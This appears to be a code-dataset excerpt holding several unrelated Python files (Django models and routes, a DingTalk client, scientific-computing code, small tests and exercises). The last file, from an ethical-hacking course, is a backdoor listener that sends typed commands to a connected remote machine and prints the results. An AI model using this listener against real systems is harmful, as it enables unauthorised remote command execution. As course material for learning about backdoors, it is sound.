| 38.636364 | 53 | 0.68 | 72 | 425 | 4.013889 | 0.291667 | 0.103806 | 0.16609 | 0.176471 | 0.605536 | 0.321799 | 0.321799 | 0 | 0 | 0 | 0 | 0.04491 | 0.214118 | 425 | 10 | 54 | 42.5 | 0.820359 | 0 | 0 | 0 | 0 | 0 | 0.451765 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
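The if/elif chain in `who.py` above grows with each product and prints nothing on ties. A sketch of the same decision using `min()` over a dict (prices invented for illustration; on a tie, the first key in iteration order wins):

```python
prices = {'A': 30.0, 'B': 25.0, 'C': 40.0}
# min() over the keys, keyed by price, replaces the pairwise comparisons.
cheapest = min(prices, key=prices.get)
print("Escolha o produto %s é o mais barato" % cheapest)
```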
be99d62141111a8ad89510bea1e2a527e33cf08b | 478 | py | Python | autodiff/debug_vjp.py | Jakob-Unfried/msc-legacy | 2c41f3f714936c25dd534bd66da802c26176fcfa | [
"MIT"
] | 1 | 2021-03-22T14:16:43.000Z | 2021-03-22T14:16:43.000Z | autodiff/debug_vjp.py | Jakob-Unfried/msc-legacy | 2c41f3f714936c25dd534bd66da802c26176fcfa | [
"MIT"
] | null | null | null | autodiff/debug_vjp.py | Jakob-Unfried/msc-legacy | 2c41f3f714936c25dd534bd66da802c26176fcfa | [
"MIT"
] | null | null | null | import pdb
import warnings

from jax import custom_vjp


@custom_vjp
def debug_identity(x):
    """
    acts as identity, but inserts a pdb trace on the backwards pass
    """
    warnings.warn('Using a module intended for debugging')
    return x


def _debug_fwd(x):
    warnings.warn('Using a module intended for debugging')
    return x, x


# noinspection PyUnusedLocal
def _debug_bwd(x, g):
    pdb.set_trace()
    return g


debug_identity.defvjp(_debug_fwd, _debug_bwd)
| 17.071429 | 67 | 0.713389 | 71 | 478 | 4.619718 | 0.492958 | 0.073171 | 0.103659 | 0.109756 | 0.310976 | 0.310976 | 0.310976 | 0.310976 | 0.310976 | 0.310976 | 0 | 0 | 0.209205 | 478 | 27 | 68 | 17.703704 | 0.867725 | 0.190377 | 0 | 0.142857 | 0 | 0 | 0.199461 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.214286 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bea3fce840a92d3dac26a2f605494f57192e6efe | 1,217 | py | Python | pyscf/nao/test/test_0037_aos.py | fdmalone/pyscf | 021b17ac721e292b277d2b740e2ff8ab38bb6a4a | [
"Apache-2.0"
] | 1 | 2019-07-01T12:39:45.000Z | 2019-07-01T12:39:45.000Z | pyscf/nao/test/test_0037_aos.py | fdmalone/pyscf | 021b17ac721e292b277d2b740e2ff8ab38bb6a4a | [
"Apache-2.0"
] | null | null | null | pyscf/nao/test/test_0037_aos.py | fdmalone/pyscf | 021b17ac721e292b277d2b740e2ff8ab38bb6a4a | [
"Apache-2.0"
] | null | null | null | # Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import print_function, division
import os, unittest, numpy as np


class KnowValues(unittest.TestCase):

    def test_aos_libnao(self):
        """ Computing of the atomic orbitals """
        from pyscf.nao import system_vars_c
        from pyscf.tools.cubegen import Cube
        sv = system_vars_c().init_siesta_xml(label='water', cd=os.path.dirname(os.path.abspath(__file__)))
        cc = Cube(sv, nx=20, ny=20, nz=20)
        aos = sv.comp_aos_den(cc.get_coords())
        self.assertEqual(aos.shape[0], cc.nx*cc.ny*cc.nz)
        self.assertEqual(aos.shape[1], sv.norbs)


if __name__ == "__main__": unittest.main()
| 38.03125 | 102 | 0.739523 | 191 | 1,217 | 4.565445 | 0.633508 | 0.068807 | 0.029817 | 0.036697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019569 | 0.16023 | 1,217 | 31 | 103 | 39.258065 | 0.833659 | 0.508628 | 0 | 0 | 0 | 0 | 0.022453 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.5 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bea8aa6132f2274610cc25a57ec0c74c8765342d | 371 | py | Python | students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py | aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022 | a63691317a72fb9b29ae537bc3d7766661458c22 | [
"MIT"
] | null | null | null | students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py | aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022 | a63691317a72fb9b29ae537bc3d7766661458c22 | [
"MIT"
] | null | null | null | students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py | aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022 | a63691317a72fb9b29ae537bc3d7766661458c22 | [
"MIT"
] | null | null | null | from django.urls import path, include
from rest_framework_jwt.views import obtain_jwt_token
from rest_framework.routers import DefaultRouter

from .views import NoteViewSet

app_name = 'api'

router = DefaultRouter(trailing_slash=False)
router.register('notes', NoteViewSet)

urlpatterns = [
    path('jwt-auth/', obtain_jwt_token),
    path('', include(router.urls)),
]
| 23.1875 | 53 | 0.77628 | 48 | 371 | 5.8125 | 0.541667 | 0.078853 | 0.121864 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121294 | 371 | 15 | 54 | 24.733333 | 0.855828 | 0 | 0 | 0 | 0 | 0 | 0.045822 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
beb313eb5f64fc657c1686ad77dc2225b87a4889 | 570 | py | Python | viewer_examples/plugins/median_filter.py | atemysemicolon/scikit-image | a48cf5822f9539c6602b9327c18253aed14fa692 | [
"BSD-3-Clause"
] | null | null | null | viewer_examples/plugins/median_filter.py | atemysemicolon/scikit-image | a48cf5822f9539c6602b9327c18253aed14fa692 | [
"BSD-3-Clause"
] | null | null | null | viewer_examples/plugins/median_filter.py | atemysemicolon/scikit-image | a48cf5822f9539c6602b9327c18253aed14fa692 | [
"BSD-3-Clause"
] | null | null | null | from skimage import data
from skimage.filter.rank import median
from skimage.morphology import disk
from skimage.viewer import ImageViewer
from skimage.viewer.widgets import Slider, OKCancelButtons, SaveButtons
from skimage.viewer.plugins.base import Plugin


def median_filter(image, radius):
    return median(image, selem=disk(radius))


image = data.coins()
viewer = ImageViewer(image)

plugin = Plugin(image_filter=median_filter)
plugin += Slider('radius', 2, 10, value_type='int')
plugin += SaveButtons()
plugin += OKCancelButtons()

viewer += plugin
viewer.show()
| 25.909091 | 71 | 0.784211 | 74 | 570 | 5.986486 | 0.405405 | 0.148984 | 0.115124 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005952 | 0.115789 | 570 | 21 | 72 | 27.142857 | 0.873016 | 0 | 0 | 0 | 0 | 0 | 0.015789 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.375 | 0.0625 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
beb680071d94ed8dd93dc11b2e313714df1f9b83 | 1,727 | py | Python | dingtalk/message/conversation.py | kangour/dingtalk-python | b37b9dac3ca3ff9d727308fb120a8fd05e11eaa5 | [
"Apache-2.0"
] | 88 | 2017-12-28T05:23:15.000Z | 2021-12-20T13:44:18.000Z | dingtalk/message/conversation.py | niulinlnc/dingtalk-python | c4209658f88344e8f0890137ed7c887c8b740a6c | [
"Apache-2.0"
] | 8 | 2018-04-28T05:41:49.000Z | 2021-06-01T21:51:11.000Z | dingtalk/message/conversation.py | niulinlnc/dingtalk-python | c4209658f88344e8f0890137ed7c887c8b740a6c | [
"Apache-2.0"
] | 43 | 2017-12-07T09:43:48.000Z | 2021-12-03T01:19:52.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/11/30 下午3:02
# @Author : Matrix
# @Github : https://github.com/blackmatrix7/
# @Blog : http://www.cnblogs.com/blackmatrix/
# @File : messages.py
# @Software: PyCharm
import json
from ..foundation import *
from json import JSONDecodeError
__author__ = 'blackmatrix'
__all__ = ['async_send_msg', 'get_msg_send_result', 'get_msg_send_progress']
@dingtalk_resp
def async_send_msg(access_token, msgtype, agent_id, msgcontent, userid_list=None, dept_id_list=None, to_all_user=False):
    try:
        msgcontent = json.dumps(msgcontent)
    except (TypeError, JSONDecodeError):
        # json.dumps raises TypeError for objects it cannot serialize; if
        # msgcontent cannot be converted to JSON, pass it to DingTalk as-is
        # and let DingTalk handle it
        pass
    if userid_list is not None and not isinstance(userid_list, str):
        userid_list = ','.join(userid_list)
args = locals().copy()
payload = {}
    # collect the request parameters
for k, v in args.items():
if k in ('msgtype', 'agent_id', 'msgcontent', 'userid_list', 'dept_id_list'):
if v is not None:
payload.update({k: v})
resp = call_dingtalk_webapi(access_token, 'dingtalk.corp.message.corpconversation.asyncsend', **payload)
return resp
@dingtalk_resp
def get_msg_send_result(access_token, agent_id, task_id):
url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendresult')
payload = {'task_id': task_id, 'agent_id': agent_id}
return requests.get(url, params=payload)
@dingtalk_resp
def get_msg_send_progress(access_token, agent_id, task_id):
url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendprogress')
payload = {'task_id': task_id, 'agent_id': agent_id}
return requests.get(url, params=payload)
if __name__ == '__main__':
pass
| 31.981481 | 120 | 0.70469 | 227 | 1,727 | 5.044053 | 0.427313 | 0.048908 | 0.034935 | 0.060262 | 0.408734 | 0.408734 | 0.265502 | 0.265502 | 0.265502 | 0.265502 | 0 | 0.009059 | 0.169079 | 1,727 | 53 | 121 | 32.584906 | 0.78885 | 0.149392 | 0 | 0.272727 | 0 | 0 | 0.209733 | 0.119945 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.060606 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
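`async_send_msg` serializes the message, normalizes the user list, then keeps only the parameters that were actually provided. A minimal standalone sketch of that filtering pattern (a hypothetical `build_payload`, mirroring the logic rather than the DingTalk API):

```python
import json

def build_payload(msgtype, agent_id, msgcontent, userid_list=None, dept_id_list=None):
    # serialize msgcontent when possible; json.dumps raises TypeError
    # (not JSONDecodeError) for objects it cannot serialize
    try:
        msgcontent = json.dumps(msgcontent)
    except TypeError:
        pass
    # accept either a comma-separated string or an iterable of user ids
    if userid_list is not None and not isinstance(userid_list, str):
        userid_list = ','.join(userid_list)
    args = locals().copy()
    # keep only the parameters that were actually provided
    return {k: v for k, v in args.items() if v is not None}

payload = build_payload('text', 42, {'content': 'hi'}, userid_list=['u1', 'u2'])
print(payload['userid_list'])  # → u1,u2
```

Capturing `locals()` after the normalization steps is what lets the function filter every parameter with one dict comprehension instead of a chain of `if` statements.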
bebc4c58538a85c2ad00b34ebacde9538e3d0d9b | 1,613 | py | Python | board/models.py | Fahreeve/TaskManager | 7f0a16312b43867270eaade1fe153c07abc2c10e | [
"MIT"
] | null | null | null | board/models.py | Fahreeve/TaskManager | 7f0a16312b43867270eaade1fe153c07abc2c10e | [
"MIT"
] | null | null | null | board/models.py | Fahreeve/TaskManager | 7f0a16312b43867270eaade1fe153c07abc2c10e | [
"MIT"
] | 1 | 2020-09-15T09:15:13.000Z | 2020-09-15T09:15:13.000Z | from django.contrib.auth.models import User
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Task(models.Model):
CLOSE = 'cl'
CANCEL = 'ca'
LATER = 'la'
UNDEFINED = 'un'
CHOICES = (
        (UNDEFINED, _("Unknown")),
        (CLOSE, _("Close")),
        (CANCEL, _("Cancel")),
        (LATER, _("Postpone")),
)
    title = models.CharField(_("Title"), max_length=50)
    description = models.TextField(_("Description"))
    executor = models.ForeignKey(User, verbose_name=_("Executor"), on_delete=models.CASCADE)
    status = models.CharField(_("Status"), choices=CHOICES, default=UNDEFINED, max_length=2)
    deadline = models.DateTimeField(_("Deadline"))
    priority = models.IntegerField(_("Priority"), default=1, validators=[MinValueValidator(1), MaxValueValidator(3)])
    changed = models.DateTimeField(_("Last modified"), auto_now=True)
    created = models.DateTimeField(_("Created at"), auto_now_add=True)
@property
def text_status(self):
choices = dict(self.CHOICES)
return choices[self.status]
@property
def text_deadline(self):
return self.deadline.strftime("%d.%m.%Y %H:%M")
class Comment(models.Model):
task = models.ForeignKey(Task, related_name="comments", on_delete=models.CASCADE)
creator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
    text = models.TextField(_('Comment'))
    created = models.DateTimeField(_("Created at"), auto_now_add=True)
| 37.511628 | 118 | 0.695598 | 180 | 1,613 | 6.061111 | 0.5 | 0.036664 | 0.038497 | 0.038497 | 0.095325 | 0.095325 | 0.095325 | 0.095325 | 0.095325 | 0 | 0 | 0.004461 | 0.16615 | 1,613 | 42 | 119 | 38.404762 | 0.806691 | 0 | 0 | 0.114286 | 0 | 0 | 0.109733 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.114286 | 0.028571 | 0.771429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
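`text_status` resolves a status code to its label by turning the `CHOICES` pairs into a dict. The same pattern without Django (constants and English labels chosen here for illustration):

```python
CLOSE, CANCEL, LATER, UNDEFINED = 'cl', 'ca', 'la', 'un'
CHOICES = (
    (UNDEFINED, "Unknown"),
    (CLOSE, "Close"),
    (CANCEL, "Cancel"),
    (LATER, "Postpone"),
)

def text_status(status):
    # dict(CHOICES) turns the (code, label) pairs into a code -> label mapping
    return dict(CHOICES)[status]

print(text_status(CLOSE))  # → Close
```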
bebe436d87bb3f3a76cbb71e91dc6e70bb5b2e46 | 475 | py | Python | test/test_hex_line.py | bicobus/Hexy | e75d58e66546c278fb648af85e3f9dae53127826 | [
"MIT"
] | 72 | 2017-08-30T03:02:51.000Z | 2022-03-11T23:15:15.000Z | test/test_hex_line.py | bicobus/Hexy | e75d58e66546c278fb648af85e3f9dae53127826 | [
"MIT"
] | 10 | 2019-03-14T08:04:33.000Z | 2021-08-10T09:36:45.000Z | test/test_hex_line.py | bicobus/Hexy | e75d58e66546c278fb648af85e3f9dae53127826 | [
"MIT"
] | 15 | 2017-11-08T05:37:06.000Z | 2021-08-05T19:16:48.000Z | import numpy as np
import hexy as hx
def test_get_hex_line():
expected = [
[-3, 3, 0],
[-2, 2, 0],
[-1, 2, -1],
[0, 2, -2],
[1, 1, -2],
]
start = np.array([-3, 3, 0])
end = np.array([1, 1, -2])
    print(hx.get_hex_line(start, end))
    print(expected)
    assert np.array_equal(
        hx.get_hex_line(start, end),
        expected)
if __name__ == "__main__":
test_get_hex_line()
| 21.590909 | 38 | 0.471579 | 68 | 475 | 3.014706 | 0.367647 | 0.117073 | 0.195122 | 0.136585 | 0.195122 | 0.195122 | 0 | 0 | 0 | 0 | 0 | 0.068627 | 0.355789 | 475 | 21 | 39 | 22.619048 | 0.601307 | 0 | 0 | 0 | 0 | 0 | 0.016842 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 1 | 0.052632 | false | 0 | 0.105263 | 0 | 0.157895 | 0.105263 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
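The expected points above are what cube-coordinate line drawing produces: linearly interpolate between the endpoints, then round each sample back onto the hex grid. A hypothetical standalone `hex_line` (a sketch of the classic recipe, not Hexy's implementation):

```python
def cube_lerp(a, b, t):
    # linear interpolation between two cube-coordinate hexes
    return [a[i] + (b[i] - a[i]) * t for i in range(3)]

def cube_round(frac):
    r = [round(c) for c in frac]
    diffs = [abs(r[i] - frac[i]) for i in range(3)]
    # re-derive the least reliable component so x + y + z == 0 holds again
    if diffs[0] > diffs[1] and diffs[0] > diffs[2]:
        r[0] = -r[1] - r[2]
    elif diffs[1] > diffs[2]:
        r[1] = -r[0] - r[2]
    else:
        r[2] = -r[0] - r[1]
    return r

def hex_line(start, end):
    n = max(abs(start[i] - end[i]) for i in range(3))  # hex distance
    return [cube_round(cube_lerp(start, end, i / n)) for i in range(n + 1)]

print(hex_line([-3, 3, 0], [1, 1, -2]))
# → [[-3, 3, 0], [-2, 2, 0], [-1, 2, -1], [0, 2, -2], [1, 1, -2]]
```

The output matches the `expected` list in the test above.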
bebe5670df71295bc98ec96c4bde4a3c31d4fb66 | 6,747 | py | Python | wofry/propagator/propagators2D/integral.py | PaNOSC-ViNYL/wofry | 779b5a738ee7738e959a58aafe01e7e49b03894a | [
"MIT"
] | null | null | null | wofry/propagator/propagators2D/integral.py | PaNOSC-ViNYL/wofry | 779b5a738ee7738e959a58aafe01e7e49b03894a | [
"MIT"
] | 1 | 2021-02-16T12:12:10.000Z | 2021-02-16T12:12:10.000Z | wofryimpl/propagator/propagators2D/integral.py | oasys-kit/wofryimpl | f300b714b038110987783c40d2c3af8dca7e54eb | [
"MIT"
] | null | null | null | # propagate_2D_integral: Simplification of the Kirchhoff-Fresnel integral. TODO: Very slow and give some problems
import numpy
from wofry.propagator.wavefront2D.generic_wavefront import GenericWavefront2D
from wofry.propagator.propagator import Propagator2D
# TODO: check resulting amplitude normalization (fft and srw likely agree, convolution gives too high amplitudes, so needs normalization)
class Integral2D(Propagator2D):
HANDLER_NAME = "INTEGRAL_2D"
def get_handler_name(self):
return self.HANDLER_NAME
def do_specific_progation_after(self, wavefront, propagation_distance, parameters, element_index=None):
return self.do_specific_progation(wavefront, propagation_distance, parameters, element_index=element_index)
    def do_specific_progation_before(self, wavefront, propagation_distance, parameters, element_index=None):
        return self.do_specific_progation(wavefront, propagation_distance, parameters, element_index=element_index)
"""
2D Fresnel-Kirchhoff propagator via simplified integral
NOTE: this propagator is experimental and much less performant than the ones using Fourier Optics
Therefore, it is not recommended to use.
:param wavefront:
:param propagation_distance: propagation distance
:param shuffle_interval: it is known that this method replicates the central diffraction spot
                             The distance of the replica is proportional to 1/pixelsize.
To avoid that, it is possible to change a bit (randomly) the coordinates
of the wavefront. shuffle_interval controls this shift: 0=No shift. A typical
value can be 1e5.
The result shows a diffraction pattern without replica but with much noise.
:param calculate_grid_only: if set, it calculates only the horizontal and vertical profiles, but returns the
full image with the other pixels to zero. This is useful when calculating large arrays,
so it is set as the default.
:return: a new 2D wavefront object with propagated wavefront
"""
def do_specific_progation(self, wavefront, propagation_distance, parameters, element_index=None):
shuffle_interval = self.get_additional_parameter("shuffle_interval",False,parameters,element_index=element_index)
calculate_grid_only = self.get_additional_parameter("calculate_grid_only",True,parameters,element_index=element_index)
return self.propagate_wavefront(wavefront,propagation_distance,shuffle_interval=shuffle_interval,
calculate_grid_only=calculate_grid_only)
@classmethod
def propagate_wavefront(cls,wavefront,propagation_distance,shuffle_interval=False,calculate_grid_only=True):
#
# Fresnel-Kirchhoff integral (neglecting inclination factor)
#
if not calculate_grid_only:
#
# calculation over the whole detector area
#
p_x = wavefront.get_coordinate_x()
p_y = wavefront.get_coordinate_y()
wavelength = wavefront.get_wavelength()
amplitude = wavefront.get_complex_amplitude()
det_x = p_x.copy()
det_y = p_y.copy()
p_X = wavefront.get_mesh_x()
p_Y = wavefront.get_mesh_y()
det_X = p_X
det_Y = p_Y
amplitude_propagated = numpy.zeros_like(amplitude,dtype='complex')
wavenumber = 2 * numpy.pi / wavelength
for i in range(det_x.size):
for j in range(det_y.size):
if not shuffle_interval:
rd_x = 0.0
rd_y = 0.0
else:
rd_x = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval
rd_y = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval
r = numpy.sqrt( numpy.power(p_X + rd_x - det_X[i,j],2) +
numpy.power(p_Y + rd_y - det_Y[i,j],2) +
numpy.power(propagation_distance,2) )
amplitude_propagated[i,j] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum()
output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(det_x,det_y,amplitude_propagated)
else:
x = wavefront.get_coordinate_x()
y = wavefront.get_coordinate_y()
X = wavefront.get_mesh_x()
Y = wavefront.get_mesh_y()
wavenumber = 2 * numpy.pi / wavefront.get_wavelength()
amplitude = wavefront.get_complex_amplitude()
used_indices = wavefront.get_mask_grid(width_in_pixels=(1,1),number_of_lines=(1,1))
indices_x = wavefront.get_mesh_indices_x()
indices_y = wavefront.get_mesh_indices_y()
indices_x_flatten = indices_x[numpy.where(used_indices == 1)].flatten()
indices_y_flatten = indices_y[numpy.where(used_indices == 1)].flatten()
X_flatten = X[numpy.where(used_indices == 1)].flatten()
Y_flatten = Y[numpy.where(used_indices == 1)].flatten()
complex_amplitude_propagated = amplitude*0
print("propagate_2D_integral: Calculating %d points from a total of %d x %d = %d"%(
X_flatten.size,amplitude.shape[0],amplitude.shape[1],amplitude.shape[0]*amplitude.shape[1]))
for i in range(X_flatten.size):
r = numpy.sqrt( numpy.power(wavefront.get_mesh_x() - X_flatten[i],2) +
numpy.power(wavefront.get_mesh_y() - Y_flatten[i],2) +
numpy.power(propagation_distance,2) )
complex_amplitude_propagated[int(indices_x_flatten[i]),int(indices_y_flatten[i])] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum()
output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(x_array=x,
y_array=y,
z_array=complex_amplitude_propagated,
wavelength=wavefront.get_wavelength())
# added srio@esrf.eu 2018-03-23 to conserve energy - TODO: review method!
output_wavefront.rescale_amplitude( numpy.sqrt(wavefront.get_intensity().sum() /
output_wavefront.get_intensity().sum()))
return output_wavefront
| 49.977778 | 156 | 0.621165 | 784 | 6,747 | 5.100765 | 0.276786 | 0.060015 | 0.032008 | 0.047512 | 0.35859 | 0.249062 | 0.218555 | 0.188547 | 0.144536 | 0.144536 | 0 | 0.011702 | 0.303394 | 6,747 | 134 | 157 | 50.350746 | 0.839149 | 0.062102 | 0 | 0.109589 | 0 | 0 | 0.024619 | 0.004299 | 0 | 0 | 0 | 0.014925 | 0 | 1 | 0.068493 | false | 0 | 0.041096 | 0.041096 | 0.205479 | 0.013699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
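Each term in the double loop above adds one spherical-wave contribution, `amplitude / r * exp(1j * wavenumber * r)`, with the inclination factor neglected. A minimal standalone sketch of a single contribution (a hypothetical helper under those same simplifications):

```python
import cmath
import math

def propagate_point(amplitude, wavelength, dx, dy, distance):
    # one Kirchhoff-Fresnel contribution: a spherical wave
    # amplitude / r * exp(i * k * r), inclination factor neglected
    wavenumber = 2 * math.pi / wavelength
    r = math.sqrt(dx ** 2 + dy ** 2 + distance ** 2)
    return amplitude / r * cmath.exp(1j * wavenumber * r)

# unit-amplitude source point seen on-axis from 2 m away, 1 um wavelength
field = propagate_point(1.0, 1e-6, 0.0, 0.0, 2.0)
print(abs(field))  # magnitude falls off as 1/r, here 1/2
```

The full propagator sums this expression over every source sample for every detector pixel, which is why it scales so much worse than the Fourier-optics propagators.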
bebf8ceeebe9e29c2c913232279dc6462e901f90 | 334 | py | Python | Desafio051.py | GabrielSanchesRosa/Python | 3a129e27e076b2a91af03d68ede50b9c45c50217 | [
"MIT"
] | null | null | null | Desafio051.py | GabrielSanchesRosa/Python | 3a129e27e076b2a91af03d68ede50b9c45c50217 | [
"MIT"
] | null | null | null | Desafio051.py | GabrielSanchesRosa/Python | 3a129e27e076b2a91af03d68ede50b9c45c50217 | [
"MIT"
] | null | null | null | # Desenvolva um programa que leia o primeiro termo e a razão de uma PA. No final mostre, os 10 primeiros termos dessa prograssão.
primeiro = int(input("Primeiro Termo: "))
razao = int(input("Razão: "))
decimo = primeiro + (10 - 1) * razao
for c in range(primeiro, decimo + razao, razao):
print(f"{c}", end=" -> ")
print("Acabou")
| 33.4 | 129 | 0.679641 | 51 | 334 | 4.45098 | 0.705882 | 0.114537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018182 | 0.176647 | 334 | 9 | 130 | 37.111111 | 0.807273 | 0.38024 | 0 | 0 | 0 | 0 | 0.17561 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
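The loop above prints the first 10 terms of an arithmetic progression. The same computation as a list comprehension (a hypothetical helper, not part of the exercise):

```python
def arithmetic_progression(first, difference, count=10):
    # n-th term of an AP: a_n = a_1 + (n - 1) * d
    return [first + n * difference for n in range(count)]

print(arithmetic_progression(1, 3))  # → [1, 4, 7, 10, 13, 16, 19, 22, 25, 28]
```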
bec28b12230a8be61261eca269a7854ba31ae9da | 820 | py | Python | src/15 listener_and_backdoor/listener_2.py | raminjafary/ethical-hacking | e76f74f4f23e1d8cb7f433d19871dcf966507dfc | [
"MIT"
] | null | null | null | src/15 listener_and_backdoor/listener_2.py | raminjafary/ethical-hacking | e76f74f4f23e1d8cb7f433d19871dcf966507dfc | [
"MIT"
] | null | null | null | src/15 listener_and_backdoor/listener_2.py | raminjafary/ethical-hacking | e76f74f4f23e1d8cb7f433d19871dcf966507dfc | [
"MIT"
] | null | null | null | #!/usr/bin/python
import socket
class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # option to reuse the address, so restarts don't hit "Address already in use"
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # listener.bind(("localhost",1234))
        listener.bind((ip, port))
        # listen for a connection; backlog is set to 0, no queued connections needed
        listener.listen(0)
        print("[+] Waiting for Incoming Connection")
        self.connection, address = listener.accept()
        print("[+] Got a Connection from " + str(address))

    def execute_remotely(self, command):
        # Python 3 sockets carry bytes, so encode on send and decode on recv
        self.connection.send(command.encode())
        return self.connection.recv(1024).decode()

    def run(self):
        while True:
            command = input(">> ")
            result = self.execute_remotely(command)
            print(result)


my_listener = Listener("localhost", 1234)
